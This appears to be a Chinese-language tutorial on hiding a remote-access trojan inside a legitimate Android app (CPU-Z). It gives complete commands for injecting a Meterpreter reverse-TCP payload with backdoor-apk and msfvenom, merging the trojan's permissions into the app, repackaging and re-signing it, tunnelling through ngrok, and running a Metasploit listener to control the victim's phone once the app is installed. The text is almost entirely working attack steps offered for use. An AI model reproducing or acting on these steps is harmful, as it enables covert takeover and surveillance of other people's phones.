標籤:keytool 網域名稱 測試 一個 rsa 不能 加密算 檔案 one
1.工具準備
kali Linux
backdoor
ngrok伺服器一台
apktool
測試APP:cpu-z
2.處理環境
apktool更新: https://ibotpeaches.github.io/Apktool/ 下載後改名為apktool.jar 覆蓋掉原/usr/share/apktool/apktool.jar
backdoor下載:命令git clone https://github.com/dana-at-cp/backdoor-apk.git
進入https://www.ngrok.cc,下載Linux 64位連接埠轉寄工具,移動到案頭備用
終端進入案頭運行 : ./sunny clientid 隧道id
進入backdoor目錄: cd /backdoor-apk/backdoor-apk
下載cpu-z,改名為1.apk,將1.apk拖到/backdoor-apk/apkdoor-apk
運行backdoor: 輸入 ./backdoor-apk.sh 1.apk,按此圖中輸入,將IP換為ngrok網域名稱,連接埠設為ngrok連接埠
找到payload注入後的apk檔案 /backdoor-apk/backdoor-apk/original/dist
改名為2.zip 移動到根目錄下,用壓縮軟體開啟。刪除META-INF檔案,退出。然後再將2.zip改為2.apk
apktool進行反編譯: apktool d /root/2.apk 會產生一個2檔案
更改許可權:開啟AndroidManifest.xml,用msfvenom -p android/meterpreter/reverse_tcp LHOST=10.161.94.25 LPORT=4444 -o obj.apk 命令產生一個木馬後門obj.apk,進行反編譯,開啟AndroidManifest.xml將所示代碼複製到 /root/2/AndroidManifest.xml 檔案下相同位置(注意不能重複)
重新打包: 命令: apktool b /root/2 會在/root/2/dist下產生一個2.apk 已示區別改名為3.apk並移動到根目錄
對打包檔案進行簽名:
先產生簽署憑證: 命令: keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore
參數說明:
-genkey 組建檔案
-alias 別名
-keylog 密碼編譯演算法
-validity 有效期間
-keystore 檔案名稱
簽名: 命令: jarsigner -verbose -keystore android.keystore -signedjar 3_signed.apk 3.apk android.keystore
參數說明:
-verbose 如果它出現在命令列中,則代表“verbose”模式,它使 jarsigner 在 JAR 簽名或校正過程中輸出額外資訊。
-keystore 指定密鑰倉庫的路徑
-signedjar 指定用於已簽名的 JAR 檔案的名稱。(覆蓋)
此時後門已添加完畢,下一步,開啟 msf 控制台,設定好監聽參數後,等待上線。開啟終端,輸入命令 msfconsole,斷行符號。進入 msf 控制台。
輸入命令 use exploit/multi/handler,斷行符號。
輸入 set PAYLOAD android/meterpreter/reverse_tcp,斷行符號。
輸入 set LHOST 內網ip,斷行符號。
輸入 set LPORT ngrok映射的本機連接埠,斷行符號。
輸入exploit 啟動監聽
將apk檔案安裝到安卓手機,大功告成,等待安卓機上線。
注意:如果你Kali linux的內網IP變了,可以直接在ngrok修改成你的內網IP然後在set LHOST設定成你內網IP然後run監聽即可。
msf外網--->>安卓